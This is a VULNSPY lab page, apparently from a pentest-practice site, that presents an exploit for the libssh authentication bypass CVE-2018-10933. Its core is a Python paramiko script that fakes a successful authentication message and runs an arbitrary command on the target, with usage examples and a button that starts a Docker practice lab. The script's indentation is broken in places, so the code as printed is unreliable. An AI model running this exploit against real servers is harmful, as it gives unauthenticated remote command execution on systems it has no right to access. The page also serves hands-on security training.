<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="Ambulong">
<meta name="description" content="Libssh 登录绕过漏洞利用 (CVE-2018-10933)">
<meta name="keywords" content="Libssh,authentication,auth,bypass,登录绕过,rce,在线环境,靶场,演示,exp,exploit,security,practict,在线靶场,黑客技术,网络安全,信息安全,漏洞测试,CTF在线,渗透测试,在线练习,演练,实验,pentest,online">
<title>Libssh 登录绕过漏洞利用 (CVE-2018-10933) | VULNSPY</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/jquery-migrate-1.2.1.min.js"></script>
<link href="/css/bootstrap.min.css" rel="stylesheet">
<link href="/css/ie10-viewport-bug-workaround.css" rel="stylesheet">
<!--[if lt IE 9]><script src="/js/ie8-responsive-file-warning.js"></script><![endif]-->
<script src="/js/ie-emulation-modes-warning.js"></script>
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
<script src="/js/bootstrap.min.js"></script>
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
<script src="/js/ie10-viewport-bug-workaround.js"></script>
<link rel="stylesheet" href="/css/custom.css" />
<link rel="stylesheet" href="/css/prism.css" />
<script src="/js/functions.js"></script>
<script src="/js/custom.js"></script>
<script>
function GetQueryString(name)
{
     var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
     var r = window.location.search.substr(1).match(reg);
     if(r!=null)return  unescape(r[2]); return null;
}
var lang="en";
var la=(navigator.language) ? navigator.language.toLowerCase() : navigator.userLanguage.toLowerCase();
if(la=='zh-cn' || la=='zh-tw' || la=='zh-hk'){
	lang="cn";
}
</script>
<!--[if lt IE 9]>
	<script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
<![endif]-->
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-108901411-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-108901411-2');
</script>
</head>
<body>
<div class="view-header" style="z-index: 999;">
    <ul>
    	<li><a href="/"><h1><img style="width:1.5em;height: auto;margin-top: -0.3em;" src="/images/owl2.png" /></h1></a></li>
        <li ><a href="/">VULNSPY</a></li>
        <li><a href="https://blog.vulnspy.com/">BlOG</a></li>
        <div class="pull-right">
            <li><a target="_blank" href="/images/qqun.jpeg">QQ 群</a></li>
            <li><a target="_blank" href="https://t.me/vulnspy">TELEGRAM GROUP</a></li>
            <li><a target="_blank" href="https://www.youtube.com/channel/UCnqjUDkrZ0OFwZvxxiC47gw">YOUTUBE CHANNEL</a></li>
        </div>
    </ul>
</div>
<style>
.main{
	
	margin: 0 auto;
	margin-top: 7em;
	max-width: 90em;
	width: 95%;
}
.lab{
	float:left;
	width: 77%;
}
.lab h1{
	padding: 0;
	font-size: 230%;
	margin: 20px 0;
	line-height: 1.5em;
}

.lab .demo{
	font-size: 115%;
	line-height: 2em;
	border: 1px solid #ccc;
	background: #2C3844;
	margin: 1.8em 0 1em 0;
}
.lab .demo .demo-btn{
	text-align: center;
	font-size: 150%;
	margin: 0.3em 0;
	color: #FFF;
}
.lab .demo .demo-btn a{
	background: transparent;
	padding: 1em;
	font-size: 100%;
	display: block;
	
}
.lab .demo .demo-link{
	background: rgba(0,0,0,.25);
}
.lab .demo a{
	font-size: 50%;
	text-transform: uppercase;
	padding: 0 0.5em;
	color: #FFF;
}
.lab .content{
	font-size: 130%;
	line-height: 1.5em;
}
.lab .content p{
	margin: 1em 0;
	word-wrap: break-word;
}
.lab .content img{
	max-width: 100%;
	margin: 1em 0;
}
.sidebar{
	width: 23%;
	float: left;
	padding-left: 2em;
	margin-top: 20px;
}
.sidebar .sth-btn {
	width: 100%;
	margin-left: 1em;
}
#sth {
	display: block;
	text-align: center;
	text-transform: uppercase;
	padding: 0.8em 1em;
	font-size:123%;
	border: none;
	border-radius: 0;
	background: #337ab7;
	color: #FFF;
	font-weight: bold;
}
#demo-notice {
	width: 100%;
	margin: 0.8em 0;
	font-size: 90%;
	text-align: center;
	color: #777;
	word-break:break-all;
}
.sidebar ul{
	margin: 2em 0;
	padding: 0;
}
.sidebar ul ul{
	margin: 0;
	margin-left: 1em;
}
.sidebar li{
	margin: 0 0 0.5em 0;
	font-size: 110%;
	list-style: none;
	color: #767676;
	border-left: solid 0.1em #FFF;
	padding-left: 1em;
	margin-left: 1em;
	cursor: pointer;
}
.sidebar li.selected{
	color: #2C3844;
	border-left: solid 0.1em #2C3844;
}
.sidebar li:hover{
	color: #2C3844;
	border-left: solid 0.1em #2C3844;
}
</style>
<div class="main">
	<div class="lab">
		<h1>Libssh 登录绕过漏洞利用 (CVE-2018-10933)</h1>
		<hr/>
		<div class="content"><p><img src="/images/libssh/default.png" alt="" /></p>
<h3>漏洞利用</h3>
<p><strong>脚本使用方法:</strong></p>
<pre><code class="language-bash">python vulnspy_libssh.py target.com 2222 'curl www.vulnspy.com'</code></pre>
<p><strong>测试脚本:</strong></p>
<pre><code class="language-python">#!/usr/bin/env python
import paramiko
import socket
import argparse
import logging
import sys
import time
import datetime

def BypasslibSSHwithoutcredentials(hostname, port, cmd):
    sock = socket.socket()
    try:
        #logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
        sock.connect((str(hostname), int(port)))
        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        # ref:http://joelinoff.com/blog/?p=905
        session = transport.open_session()
        session.exec_command(cmd)
        data = ''
        maxseconds = 5
        start = datetime.datetime.now()
        start_secs = time.mktime(start.timetuple())
        while True: 
        if session.recv_ready():
            data = data+session.recv(2048)
        if session.exit_status_ready():
            break
        now = datetime.datetime.now()
        now_secs = time.mktime(now.timetuple()) 
        et_secs = now_secs - start_secs
        if et_secs &gt; maxseconds:
            data = data+'\ntimeout'
            break
    print data
        return 0

    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1

def main():
    try:
        hostname = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
    except:
        print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl www.vulnspy.com'")
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port, cmd)

if __name__ == '__main__':
    exit(main())</code></pre>
<h3>REFERENCE</h3>
<ul>
<li><a href="https://github.com/vulhub/vulhub/tree/master/libssh/CVE-2018-10933">vulhub/vulhub/libssh/CVE-2018-10933/</a></li>
<li><a href="https://github.com/SoledaD208/CVE-2018-10933/blob/master/CVE-2018-10933.py">SoledaD208/CVE-2018-10933</a></li>
</ul></div>
	</div>
	<div class="sidebar">
		<div class="sth-btn">
			<a id="sth" target="_blank" href="https://www.vsplate.com/?docker-compose=https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/docker-compose.yml&amp;autogo=1">start to hack</a>
			<p id="demo-notice">Click the button and start the playing.</p>
		</div>
		<ul>
			<li href="#" class="nlink selected"># TOP</li>
		</ul>
	</div>
</div>
<script>
if(lang == 'cn'){
	$("#demo-notice").html("点击上方按钮开启实验.");
}
$(document).ready(function(){

$.extend({
	genMenu: function() {
		var html = '';
		var prevH = 'h0';
		var toClose = 0;
		$(".content").children("h1,h2,h3,h4,h5").each(function(i,e){
			var tagName = $(e)[0].tagName.toLowerCase();
			//var menuName = 'M-'+window.btoa($(e).text());
			var menuName = 'M-'+randomString(32);//+'-'+$(e).text().replace(/\ +/g,"-");
			$(e).attr('id',menuName);
			if(tagName > prevH){
				html = html+'<ul>';
				html = html+'<li class="menu-item nlink" href="#'+$.escapeHtml(menuName)+'">'+$.escapeHtml($(e).text())+'</li>';
				toClose = toClose + 1;
			}else if(tagName == prevH){
				html = html+'<li class="menu-item nlink" href="#'+$.escapeHtml(menuName)+'">'+$.escapeHtml($(e).text())+'</li>';
			}else if(tagName < prevH){
				html = html+'</ul>';
				html = html+'<li class="menu-item nlink" href="#'+$.escapeHtml(menuName)+'">'+$.escapeHtml($(e).text())+'</li>';
				toClose = toClose - 1;
			}
			prevH = tagName;
		});
		while(toClose > 0){
			html = html+'</ul>';
			toClose = toClose - 1;
		}
		$(".sidebar ul").remove();
		$(".sidebar").append(html);
		$(".sidebar ul:first").prepend('<li class="menu-item nlink selected" href="#"># TOP</li>');
		return html;
	}
});
$.extend({
	selectMenu: function() {
		var mintoTop = 20;
		var menu = [];
		$("li.menu-item").each(function(i,e){
			id = $(e);
			if(id && id != '#'){
				menu.push(id);
			}
		});
		for(var i=menu.length;i>0;i--){
			mid = menu[i-1].attr('href');
			var toTop = $(mid).offset().top-$(document).scrollTop();
			if(toTop <= mintoTop){
				$("li.menu-item").removeClass('selected');
				menu[i-1].addClass('selected');
				break;
			}
		}
		return mid;
	}
});
$.extend({
	fixSidebar: function() {
		var sidebarTop = $(".sidebar").offset().top-$(document).scrollTop();
		if($(document).scrollTop() < 120){
			$(".sidebar").css("margin-top", "20px");
		}else if(sidebarTop < 20){
			$(".sidebar").css("margin-top", ($(document).scrollTop()-80)+"px");
		}else if(sidebarTop > 20 && $(document).scrollTop() > 120){
			$(".sidebar").css("margin-top", ($(document).scrollTop()-80)+"px");
		}
	}
});
$.genMenu();
$(window).scroll(function(){
	$.fixSidebar();
	$.selectMenu();
});

});
</script>
<div style="float:left;width:100%;text-align:center;margin-top:5em;background: #000;color: #FFF;">
	<div style="margin:0 auto;width:95%;max-width:90em;padding:1em 0;">All rights reserved. &copy; 2018 VULNSPY</div>
</div>
<script>
$(function () {
	$("pre code").closest("pre").addClass("line-numbers ");
});
</script>
<script src="/js/prism.js"></script>
</body>
</html>
